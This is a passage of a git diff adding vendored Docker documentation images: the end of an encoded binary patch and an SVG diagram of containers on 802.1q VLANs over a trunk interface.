z5D7b?HzP!-dvq}&W%!vyM=LwRt9uQ8l;Uyl_uSa!H!B6$6uy~Vg$SqAqp_QZ!lPuk
zfNoR%K$*YejOFi>W(91%)zevdoylqjmA@%P2At{~42)X&EiW?+*+-4v4Ycp!@dWvw
zDgBqLm`<rhYHSZ0b@ycvG@YEC<x4h%adOKFSK3GZV$A_Rc?YT;zHHIIu`|@<at%h%
z^y)p!e<*bBYtLde*4oh3WD$K>+2=~Fdb&CFawyt!AknMLEA8XK%Aupv%7<ebFH(<I
zbxO5axt~RU<u&(Fw(a~*_s_ZSU_#Vg%vJvq^IvRP3C9;Ni}YMF8{R(L-xz($_}Kz7
z(wqr!)01r4e}yP@+;dd-!$*+F-P!g%;b<*53<KC^O+5Q-J4dELq<<WEHDfq*Ncj4w
zT}vL}+D(ISpMH<)X<qX{yo|&K0R|h_B(0c-yDbc#iCDK1w12@nn}vU*qyA$h=R8*T
z^QZFOdI~M+vZFHKo33TNF9@EFV}EES*!)-~_{y8H^UtF}XkB7s0<E>KBaJv3dUU~F
zDnhkLRK0fs$mi3UOTj*Aqy7ON6&X^UKXq(73j#;3Um*(6a7w=Eb&`O@KbAb|FG5l5
z@1^u!`!0@ondd;Z;zY&k>0abQ{OZ~A%;vBnGk7d#l4-^k?+a$ESC=ES;2A|LIw+sG
zov|H??43x6y?*(tHMoJ0&o49co4MN#Rz<e8YQ*vYJ8DEb;nDv}&)crMy+qqI2@B9@
z_WP+X;-8FB#gr@?pNk7uen7PHg4*P$0_z&#t3O8kcD`yE1z;f(@Pq1em+>_Y6vX6e
z-(5!8HguEgP@N24RWa6d`e#;0fe(FSLq%B<J0npg3(-1|oj)VN?2f6xsnoFjCBVFS
zo;Or&vm?+h{rY?FSC?b@of({oi}uUwe;H@Ezv{0bhFe0-k!Yxv$j9S4n$AwU2gm?f
z+k{gQ4Dfrd`tE)_jonarc*^cXneL((aIuYM$7J=N!?Ioe3W~P=z8|R`=cm<L0e52w
z@gv7*zMHKUgtba#wjT2zb>x^b6%W3e2L;B^-)861&F4|)pMSa)fA5d%70C71M6))P
z@6i^+GmhDfM`)-_;NQtQtm#tp>BTTUxJM5ND88t#K~=eB4*1M?e{-tjjU*7!-i@fI
z1OK@F9K%`!K$E_XgkzH6ncXhYx+T$6AO;}g<C<UVj>M<%e&Bg)$WXxf1q8@o*ynQp
zYOfb;D0%56T7))UhDk!_V{bZDXuC|Hatfm5`Sk|heaUkQ4+GhwK!Ady$P(q>(9pkb
zXk=u>^>o|eHA?VUb+Q?^S-X9b&=9V~`K1fl4;eWigu`zNPn6y5&tIe;*}Ov(ut@TM
zQG6T}*(ppat0YdXMG1(TCjEyY5rKi}HS#1o;&8mf4~Y}wxFj4D1pp`?RzP^Q*`u1^
z+7CH=y)dE^(W%v>rJTa3etdjF^$1sc`vS!2@rb?<RVRzd`0>P}6)hsEi*@mn$*rsZ
z*JfPQrK6anuKW4(vrA?lGMd2=a|$k6h-LJAAtTMlC75cSiZj&6P7!sI%c0aCFCn&_
zaw0M}v%sR}WI`hFLD>DRdboJN4l-IZz@+>2#LXSmU)?JFXaW!aQqmm<)w~WAnW$&8
zO06QprL)YG)PHgvYRjT^Cx2nrbs!rfMl1Wtp(E@8wGf-nc%bO#NzDYpej0D?x4Vl5
z>m<B*$*#;{Ep$cZ6A?e0F5ga^eS>)%{(S?aP5eP~xF_48ah}6gc{lcH2I-?<dfSkV
zSMBikh`Owphd;M69D6*#WkZo~rY>jlkMGVt+md@3Yx}V)kSbG6R&v++l4&6SN}?GZ
zRdZTx5P5hf?(j7jkpe_LZf8E*#8~F#!JL+s`~$ggf;}>kXtlZ;G5`Fg%3Njq=b<&l
zU>uvr=7(hE?<{hSeL-8xBbhI9>Yytcel^R1t$?rf&cX~r`L^i=o=O^IOom_Dd{qUJ
zail2X-MQHDJkJBL`vp2MOTG)`p?pgp>l(&y%MI_{_LSQNCk`w3YSyDK0DjbJ@_kjH
z;~sf4NKJJ26B_xmzpX--4KG(+W{l;!bSMkmne469Ugk|SEIl8^SpJSU<M1Es0a(BN
zZ_D~2#@BtFX^YjV<=}?`2#9B&ObVw$8tK(X4YXy+YpfjJwtnxQcmO0igBO=W%CX;3
zl7y8<LRO+{pQMdKSc2_38gH?;KGf`+4h>@$a*kq(bN30OYWo%wjL35S$m2|v-vCEV
z9;fQiEDv%U61L=z%FBOS5sN7^W_wf@xm}`e6~Qx(V3xYgj5KlI_KNU67`+1Y1GMbU
zJCM?69K(%tleG#o%!G9113xSRR8o@6+FDyr)PDtYxdf^ND7r|>3+m2t;eOlHAbwrs
zbw8)tp{`?#N>Hy>Vw#I7(z02B0<w%%MR&<u=Px{*?)XSOZrq-1)`gu_GJkyJ8B@mk
zW*pp7a7}m#<$<B`d34u!YElO8HT9Wfv*!6MrYI4d)}UB@9X_;E)qGmYV_%w_oHV!7
zZwDPcDkz-Li;ccek?m4)DAzMr`MC({zrAnlpHM(iffp3JmS1wk*^NMFaGqkrk$JA!
z3pog`p||#7n4upwSZX9`&faerXJE&i;#5MWSo6%vFZtqmh)b$jczV7EOsRT!@GZ_F
z$pwDkBMDGovM(g#3Jj6-$W=cZok|hs;Q%c8ryLlkigCPSs>x^N^}%SwYLlWp@+i|)
zatj!bQnjjCdTV?pg>rnxS44WT0OEQfm>^wgO2=?0i6_}Y_~e$TTEI%|SPD1@R>bq<
zg2`!ar%7_C%Kl<)qLZQSw{jsf^Jc+~V#S-%V{$ng&!1vV3q-tD?feCew$g(`diU5!
zW=HzyUb<kxyGO-|lb{xj_v>}&!#!sNpq;x+tBf*c`0eX-_G$KL-Wq=;r!YaE6?I+d
zJP4<l*AeM^lsj%JT%~tIF3@JiS!umjv6P-b9o#fapRuDiGix0<C46n=VBTWmd6!>v
zYwZ20rc)i-xvV)D@&Z76bEK3vf9%rU&<65}(H%_@)zH<-)#%-2Dn595eqv$TAnBkM
z^?WTC_!ofY$wQ{V_+6uP$VBR2BBM`Sg;4ED@K2Etf1mSu{D-HS(;C?LO{??a92!_V
z^fEQ&{q6@vX}el^h4NG4kf=6kDcv)sPjqb5d5K=xaT0#lv=c#($wC>ad^E@~Mm@Gg
z*#Dobs?9oLE`6UK;Mo!1-gn+^VhULP-@Na-+)QVz4a;9j(o@sY!kuLImJ|A44rgn`
zIu*tSH};M!Wk)1otS&LGhX;^ipQFMHRsVIpn(Nv(l(f-B@=!QB7Ef`Ftz2%qq+RF(
z?YerZIHz%hxh0M{&AUy=+ar(f#0%E`)axho@(%&|?>IU;FY$xcE`O<uQKa$+sVq)~
zzIJ*(E+j4W9*MkAHz4H!L({qG8&_6VR8pCDX}s788#K<PY&}ZF-Es+EuOD78E5!?6
z+||Ky_EXDFRZvV*TJJ^)_rD_hR5W6B$uY;pt(HJzjQq#a6Sv?jFLjudYC0!g9tC_w
z7b7-IBC#5IFYct5*@%XIG?Kewpga=Q+{572`o)$9P4tdC?*+Q_IvM?Ee;oJ6yQ^=*
zsTU+gCOo8JEk+!NhPH%6;o(TVr|D86j{LeNLf{O(fb*~7<?FmDb9Q~1(q*(ihY<}`
zvhphsu7b*4<NH(mMfemgZx?`5d2Sc!MACAAAphVkMhMIKALW|YL6Iv-Y%DA{e~a|*
zGkR$En_i3@+0FF_#xgh4(G=NX5uuC!iIYJ-mw)&p2h(N}>dt=|Q8V#;qCF^rc~|!;
z$03QC1fa!sN2;rnk3x_e@|#I(4czUYba3DZ(ZWR-w~yzV%!jn<PyDkDnR<~rV|9>S
zI=|~Z2r@9^K6cOV9SQpw{wF37N%lAT=kQO~$#=au6eB#p?KtpWTcCmd!iM34ElUM`
zT%NWTfA6=o639Q!#xt%X%4G|l@4IemhMEa^QItX%L_qY$Ma<64;qt#U2v=WU9$EjA
z9y*uPxeXDO#I3#AAZpSPWa_)nnPJ12t%$=BrW6EHBz%c#iB`PC#H;UpUmx|IqEa}R
z7rrqO^$_=QQo2H5f<Aq>_61(&4qg)TW+Ir<fhHTaanqYmDX{s2LhV;3fsZ@g<+qSQ
zWwZR~PpbL<dJC0z3JNH7P>nFGPhZ{~x<SPL$dzneyl{hR?~0$a_EF#$rpY<oZJlNZ
z8$nv<xTQzAo%Ey(K0yD!xtqls9Juk+E1{e{$@BHS_urLgynXvt1?c<kxbB#OkQ<GM
z-uK%pW*v#tpVnaP`ss+%D^J$`iF@oOzn)?Ss!LlQTZD*QFg&wc@$&p5?SBv2%@h2h
zwjOA8`sq7S?>4OK4gEcN(vBVXo1T=ck8fCUp6g%z?@m#P*^>KMXZd7=E>JyreSU^X
zm&dee)0)ofFnxNm&F9I#?R$;Wa-}&AZ>SGmSY7Xaa?bw=^DkUntS0V%@Z1ESqs_;8
zB%Kt!IXVxTp73@|usNa7{M#zezDcJxbX|GuADdvInV)}7{OoD<@}Bi=_79OW>$m?g
z`@eA2+2Y#lhUZV79p>-|Dl~EXVb}it@|S0quN(C$Xw0z|zW3|pzC7=e*S+%Ht15O}
z@PGbzli_EFo6LXr8F5J6UioSE_0JD~Z_+CHU^$2X`F*{(<?sKmSmm^ksr^n<Z0cK+
zl4IM<TJ=I68>@yrtv}nS5&!vBR_42NAzV-A%y8Q(dUenH`-^_q-7HNxz5MeY)8FOa
zr*FOXrR@Ixx_i}SR>BV~r~Y)<rM~jVv&S{_cfSi>K1J1J{=R9QKWpYm{_9*M9=UPf
z#iNJjFFzo6UDuJ@{{7O=r)w`>J9m0ZzP{XlyB||7|J(VuaDhQ-V3hUo-W%6agW2V_
zWJdk46ezQe-oO8ud;g7vb(?Rxn7;qL{e#Wx+}mI`=<ofT8a?~oyT|Q&)0Z1F&I_K!
zzp#2zSGwJ)?~x^Um-A(wUA{gw$!KOu{*K+dZ?gujy)I}ZzUos&P@SmmxrI^Dk0)LT
zx-m1c+f3bXzTD^eCqBQN!SA<|<Gaj0|I4%e<4@}d++}motqWfM$hu(SB4@n~g|)S7
zD|F5z%YEj|p4mTd>qZ5}=ncW#H{L8@?Uj_5D>q|nKA5%jk{U=wX7<eUmoHB)y=b*+
zVympo#u&Z!!-?P6{)X#_bsr7`sSteGdRB0&^3;W1YmOIuORiS$Kex10KFV3w)caSd
z+3cIA4f-q3{NEq-Y{|J-7pBNATo)f3tNAzVam}p8(0M#k5f}GeiAsr@wJ`0NT=_cL
zxggc<Yf~4#V2ZeGZS>;6)2FF{BBqTqj@vwYd~H*~w%fp*k;|sH>+@1|w*I$?a-V1P
zd+48%X}y>+<)EMxODP*S$b{vqQy*sV>MiBYSk->?!91O=^h+_kcTZn8ykpo_c_!IT
zX|G7RN!Ox^y1HxWv*+<xt-N;K>ip+-<y)cFGcf#T+sebx5XHvepv%mVCCR`*4);S`
b9iz+s-oKmmO1OaswlH|Q`njxgN@xNAR!440

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.svg b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.svg
new file mode 100644
index 0000000000..5c6c6070a6
--- /dev/null
+++ b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.svg
@@ -0,0 +1 @@
+<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="409" height="232.14285409109937"><style xmlns="http://www.w3.org/1999/xhtml"></style><defs><linearGradient id="RKkzpzQhZTCk" x1="0px" x2="0px" y1="100px" y2="-50px" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#3d85c6"/><stop offset="1" stop-color="#FFFFFF"/></linearGradient><linearGradient id="SeALyqvahCFZ" x1="0px" x2="0px" y1="100px" y2="-50px" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#3d85c6"/><stop offset="1" stop-color="#FFFFFF"/></linearGradient><linearGradient id="KIKSmddbxdCC" x1="0px" x2="0px" y1="100px" y2="-50px" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#3d85c6"/><stop offset="1" stop-color="#FFFFFF"/></linearGradient></defs><g transform="translate(0,0)"><g><rect fill="#ffffff" stroke="none" x="0" y="0" width="409" height="232.14285409109937"/></g><g transform="matrix(1,0,0,1,49.49612211422149,23.274999999999892)"><g transform="translate(0,0)"><g transform="translate(-118,-61.828333333333035) translate(68.50387788577851,38.55333333333314) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#ffe599" d="M 53.99612211422149 27.77500000000007 L 315.0022137987153 27.774999999999892" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,46.49612211422149,22.20833333333323)"><g transform="translate(0,0)"><g transform="translate(-115,-60.76166666666637) translate(68.50387788577851,38.55333333333314) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#e69138" d="M 50.99612211422149 26.708333333333407 L 312.0022137987153 26.70833333333323" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,46.49612211422149,20.074999999999903)"><g transform="translate(0,0)"><g transform="translate(-115,-58.628333333333046) translate(68.50387788577851,38.55333333333314) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#e06666" d="M 50.99612211422149 24.57500000000008 L 312.0022137987153 24.574999999999903" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,44.49612211422149,17.874999999999943)"><g transform="translate(0,0)"><g transform="translate(-113,-56.428333333333086) translate(68.50387788577851,38.55333333333314) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#999999" d="M 48.99612211422149 22.37500000000012 L 310.0022137987153 22.374999999999943" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,44.49612211422149,24.574999999999847)"><g transform="translate(0,0)"><g transform="translate(-113,-61) translate(68.50387788577851,36.42500000000015) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#999999" d="M 48.99612211422149 29.075000000000003 L 310.0022137987153 29.074999999999847" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,46,63)"><g transform="translate(0,0)"><g transform="translate(-64,-36) translate(18,-27) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#e69138" d="M 52 69 L 138 69 Q 148 69 148 79 L 148 112 Q 148 122 158 122 L 184 122" stroke-miterlimit="10" stroke-width="5"/></g></g></g></g><g transform="matrix(1,0,0,1,42,42)"><g transform="translate(0,0)"><g transform="translate(-190,-32) translate(148,-10) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#f1c232" d="M 48 48 L 234 48 Q 244 48 244 58 L 244 137 Q 244 147 254 147 L 277 147" stroke-miterlimit="10" stroke-width="5"/></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,133.38636363636374,108.14285409109937)"><g><g transform="translate(0,0) scale(1.7571428571428573,2.3636363636363638)"><g><g><g><path fill="#999999" stroke="rgb(0,0,0)" d="M 58.97 19.094 C 58.977 18.895 59 18.7 59 18.5 C 59 8.283 50.717 0 40.5 0 C 33.11 0 26.751 4.344 23.787 10.607 C 22.275 9.593 20.458 9 18.5 9 C 13.5 9 9.41 12.866 9.037 17.771 C 3.778 19.616 0 24.61 0 30.5 C 0 37.787 5.778 43.71 13 43.975 L 13 44 L 58 44 L 58 43.975 C 64.671 43.71 70 38.235 70 31.5 C 70 25.095 65.18 19.822 58.97 19.094 Z M 58 41.975 L 58 42 L 13 42 L 13 41.975 C 6.883 41.711 2 36.683 2 30.5 C 2 24.994 5.872 20.398 11.039 19.271 C 11.013 19.017 11 18.76 11 18.5 C 11 14.357 14.358 11 18.5 11 C 21.017 11 23.239 12.244 24.6 14.146 C 26.512 7.15 32.897 2 40.5 2 C 49.613 2 57 9.388 57 18.5 C 57 19.353 56.914 20.183 56.79 21 L 58 21 L 58 21.025 C 63.565 21.288 68 25.87 68 31.5 C 68 37.13 63.565 41.712 58 41.975 Z" stroke-opacity="0" stroke-miterlimit="10"/></g></g></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,46.65404609475037,143.99656534721677)"><g><g transform="translate(0,0) scale(0.44395492957746485,0.26378466557911767)"><g><path fill="url(#RKkzpzQhZTCk)" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.2524809014999616,3.790970933828097)"><path fill="none" stroke="none" d="M 0 0 L 44.395492957746484 0 Q 44.395492957746484 0 44.395492957746484 0 L 44.395492957746484 26.378466557911768 Q 44.395492957746484 26.378466557911768 44.395492957746484 26.378466557911768 L 0 26.378466557911768 Q 0 26.378466557911768 0 26.378466557911768 L 0 0 Q 0 0 0 0 Z"/><path fill="url(#RKkzpzQhZTCk)" stroke="#6fa8dc" d="M 0 0 M 0 0 L 44.395492957746484 0 Q 44.395492957746484 0 44.395492957746484 0 L 44.395492957746484 26.378466557911768 Q 44.395492957746484 26.378466557911768 44.395492957746484 26.378466557911768 L 0 26.378466557911768 Q 0 26.378466557911768 0 26.378466557911768 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,50.53252582967698,139.4965653472169)"><g transform="translate(0,0)"><g transform="translate(-53.7573249679898,-143.64485245977795) translate(3.224799138312825,4.148287112561064) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 55.03252582967698 143.9965653472169 L 55.03252582967698 170.37503190512842" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,78.11478334058147,139.4965653472165)"><g transform="translate(0,0)"><g transform="translate(-83.50230524967998,-145.05170400953324) translate(5.38752190909851,5.55513866231675) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 82.61478334058147 143.9965653472165 L 82.61478334058147 170.37503190512865" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,64.35179257362361,139.49656534721677)"><g transform="translate(0,0)"><g transform="translate(-67.51992778489121,-145.05170400953324) translate(3.1681352112675967,5.555138662316466) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 68.85179257362361 143.99656534721677 L 68.85179257362361 170.37503190512854" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,17,177)"><g transform="translate(14,28) matrix(1,0,0,1,0,0) translate(-14,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="104" height="28" fill-opacity="0"/></g></g><g transform="translate(14,28) matrix(1,0,0,1,0,0) translate(-14,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="104" height="14" fill-opacity="0"/></g></g><g transform="translate(14,28) matrix(1,0,0,1,0,0) translate(-14,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="0" width="103" height="14" fill-opacity="0"/></g></g><g transform="translate(14,28) matrix(1,0,0,1,0,0) translate(-14,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="0" width="103" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="1" y="12">container1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="12"> -</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="68" y="12">vlan10</text></g><g transform="translate(14,28) matrix(1,0,0,1,0,0) translate(-14,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="104" height="14" fill-opacity="0"/></g></g><g transform="translate(14,28) matrix(1,0,0,1,0,0) translate(-14,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="12" y="14" width="81" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="12" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="32" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="36" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="56" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="59" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="69" y="26">2</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="76" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="79" y="26">24</text></g></g><g transform="matrix(1,0,0,1,70,90)"><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g/></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="74" y="-7" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="74" y="-7" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="1" height="14" fill-opacity="0"/></g></g></g><g transform="matrix(1,0,0,1,73,7)"><g transform="translate(3,0) matrix(1,0,0,1,0,0) translate(-3,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="106" height="19" fill-opacity="0"/></g></g><g transform="translate(3,0) matrix(1,0,0,1,0,0) translate(-3,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="106" height="14" fill-opacity="0"/></g></g><g transform="translate(3,0) matrix(1,0,0,1,0,0) translate(-3,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="3" y="0" width="102" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="3" y="12">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="26" y="12"> -</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="37" y="12">802</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="60" y="12">1q</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="77" y="12">trunk</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,282,8)"><g><g transform="translate(0,0) scale(0.6083333333333336,0.6104050109462419)"><g><g><path fill="#3966A0" stroke="rgb(0,0,0)" d="M 102.635 0 C 93.815 0 86.371 6.797 85.395 15.43 L 4.554 15.43 C 2.043 15.431 0 17.473 0 19.984 L 0 53.338 C 0 55.849 2.043 57.892 4.554 57.892 L 8.016 57.892 L 8.016 65.776 L 96.471 65.776 L 96.471 57.892 L 99.672 57.892 C 102.184 57.892 104.227 55.849 104.227 53.338 L 104.227 34.655 C 107.211 34.382 109.971 33.334 112.331 31.735 L 112.331 31.735 C 112.785 31.428 113.223 31.1 113.643 30.753 C 113.655 30.744 113.665 30.734 113.676 30.725 C 114.093 30.38 114.492 30.017 114.875 29.635 C 114.875 29.635 114.887 29.623 114.893 29.617 C 118.039 26.471 120 22.143 120 17.365 C 120 7.79 112.21 0 102.635 0 Z" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 102.688 3.191 C 94.836 3.191 88.45 9.579 88.45 17.43 C 88.45 25.281 94.838 31.669 102.688 31.669 C 110.54 31.669 116.926 25.281 116.926 17.43 C 116.926 9.579 110.539 3.191 102.688 3.191 Z M 97.377 20.901 C 97.118 20.901 96.859 20.802 96.662 20.605 C 96.267 20.21 96.267 19.569 96.662 19.174 L 97.412 18.424 L 91.228 18.424 C 90.669 18.424 90.216 17.971 90.216 17.412 C 90.216 16.853 90.67 16.4 91.229 16.4 L 97.414 16.4 L 96.699 15.686 C 96.303 15.291 96.303 14.65 96.699 14.255 C 97.095 13.86 97.735 13.86 98.13 14.255 L 100.571 16.696 C 100.665 16.79 100.739 16.902 100.791 17.026 C 100.894 17.273 100.894 17.552 100.791 17.799 C 100.739 17.924 100.665 18.036 100.571 18.129 L 98.093 20.605 C 97.895 20.802 97.637 20.901 97.377 20.901 Z M 105.863 25.522 L 103.422 27.963 C 103.225 28.161 102.965 28.259 102.707 28.259 C 102.698 28.259 102.689 28.254 102.68 28.254 C 102.671 28.254 102.663 28.259 102.655 28.259 C 102.305 28.259 102.012 28.07 101.83 27.801 L 99.515 25.484 C 99.119 25.089 99.119 24.448 99.515 24.053 C 99.91 23.658 100.55 23.658 100.945 24.053 L 101.644 24.752 L 101.644 9.174 L 100.945 9.873 C 100.748 10.071 100.488 10.169 100.23 10.169 C 99.97 10.169 99.711 10.07 99.515 9.873 C 99.119 9.478 99.119 8.837 99.515 8.442 L 101.954 6 C 102.35 5.605 102.988 5.605 103.385 6 L 105.864 8.478 C 106.26 8.873 106.26 9.514 105.864 9.909 C 105.667 10.107 105.408 10.205 105.149 10.205 C 104.889 10.205 104.63 10.106 104.434 9.909 L 103.667 9.143 L 103.667 24.857 L 104.434 24.091 C 104.829 23.696 105.468 23.696 105.864 24.091 C 106.258 24.486 106.258 25.126 105.863 25.522 Z M 114.148 18.46 L 107.964 18.46 L 108.677 19.174 C 109.073 19.569 109.073 20.21 108.677 20.605 C 108.48 20.803 108.22 20.901 107.961 20.901 C 107.702 20.901 107.442 20.802 107.246 20.605 L 104.808 18.165 C 104.713 18.072 104.64 17.959 104.587 17.835 C 104.485 17.588 104.485 17.309 104.587 17.062 C 104.64 16.937 104.713 16.825 104.808 16.732 L 107.284 14.255 C 107.68 13.86 108.32 13.86 108.715 14.255 C 109.11 14.65 109.11 15.291 108.715 15.686 L 107.964 16.437 L 114.149 16.437 C 114.708 16.437 115.161 16.89 115.161 17.449 C 115.16 18.008 114.707 18.46 114.148 18.46 Z" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 80.533 36.476 A 3.247 3.247 0 1 0 80.53299837650013 36.47924699945883 Z" opacity="0.5" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 9.278 35.006 L 20.39 35.006 L 20.39 24 L 9.278 24 L 9.278 35.006 Z M 10.929 25.567 L 18.819 25.567 L 18.819 31.173 L 16.536 31.173 L 16.536 33.456 L 13.213 33.456 L 13.213 31.173 L 10.93 31.173 L 10.929 25.567 L 10.929 25.567 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 24.253 35.015 L 35.365 35.015 L 35.365 24.009 L 24.253 24.009 L 24.253 35.015 Z M 25.904 25.576 L 33.794 25.576 L 33.794 31.182 L 31.51 31.182 L 31.51 33.465 L 28.187 33.465 L 28.187 31.182 L 25.904 31.182 L 25.904 25.576 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 50.3 24.009 L 39.188 24.009 L 39.188 35.014 L 50.3 35.014 L 50.3 24.009 Z M 48.729 31.173 L 46.446 31.173 L 46.446 33.456 L 43.123 33.456 L 43.123 31.173 L 40.84 31.173 L 40.84 25.567 L 48.73 25.567 L 48.729 31.173 L 48.729 31.173 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 54.123 35.023 L 65.234 35.023 L 65.234 24.018 L 54.123 24.018 L 54.123 35.023 Z M 55.774 25.567 L 63.664 25.567 L 63.664 31.173 L 61.38 31.173 L 61.38 33.456 L 58.057 33.456 L 58.057 31.173 L 55.774 31.173 L 55.774 25.567 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 9.278 49.95 L 20.39 49.95 L 20.39 38.944 L 9.278 38.944 L 9.278 49.95 Z M 10.929 40.502 L 18.819 40.502 L 18.819 46.108 L 16.536 46.108 L 16.536 48.391 L 13.213 48.391 L 13.213 46.108 L 10.93 46.108 L 10.929 40.502 L 10.929 40.502 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 24.253 